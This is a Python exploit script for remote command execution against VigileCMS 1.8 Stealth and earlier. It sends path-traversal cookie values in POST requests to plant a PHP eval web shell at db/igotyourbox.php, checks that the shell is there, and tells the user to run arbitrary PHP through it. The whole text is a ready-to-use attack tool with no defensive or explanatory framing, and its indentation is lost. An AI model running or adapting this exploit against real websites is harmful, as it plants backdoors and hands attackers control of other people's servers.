import sys, httplib, urllib
print ""
if len(sys.argv)<=1:

print "################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " %s [Target] [Path] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
print " "
print " You may have to set other options in the "
print " code, like port if it isn't 80 "
print " or options for old viglecms' versions. "
print " "
print "################################################\n"
sys.exit()
else:
print "################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " %s [Target] [Path] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
print " "
print " You may have to set other options in the "
print " code, like port if it isn't 80 "
print " or options for old viglecms' versions. "
print " "
print "################################################\n"
print "[.]Exploit Starting. "
#Some Vars
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version
port = 80
db = "db" #Directory of database
target = sys.argv[1]
try:directory = sys.argv[2]
except IndexError:directory = "/"
#Starting
try:
#Verifing /db/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%sdb/index.php" % (directory))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
sys.exit("[-]/db/index.php not found (404). Aborted.")
conn.close()
#Verifing /pm/index.php
conn = httplib.HTTPConnection(target,port)
conn.request("GET", "%sdb/pm/index.php" % (directory))
r1 = conn.getresponse()
print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason
if r1.status == 404:
sys.exit("[-]/db/pm/index.php not found (404). Aborted.")

except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted.")

if old == 1:
pt = "/"
pt2 = "?"
else:
pt = "?"
pt2 = "&"

conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '../.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #1 -->",response.status, response.reason
conn.close()

conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '../igotyourbox.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #2 -->",response.status, response.reason
conn.close()
try:

conn = httplib.HTTPConnection(target,port)
path = "%s%s/igotyourbox.php" % (directory,db)
conn.request("GET", path)
r1 = conn.getresponse()
conn.close()
except httplib.ResponseNotReady:
sys.exit("[-]ResponseNotReady. Aborted.")

print "[.]Verifing Exploit Success..."
if r1.status == 404:
sys.exit("[-]Exploit Failed.")
else:
print "[+]Done.\n[+]Removing the page..."
conn = httplib.HTTPConnection(target,port)
path = directory + "db/igotyourbox.php?dox=unlink('%3C?php%20eval(stripslashes($_GET[dox]));%20?%3E.paradox-got-this-one.php');"
conn.request("GET", path)
print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s%s/igotyourbox.php \n With Content:\n \n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,directory,db)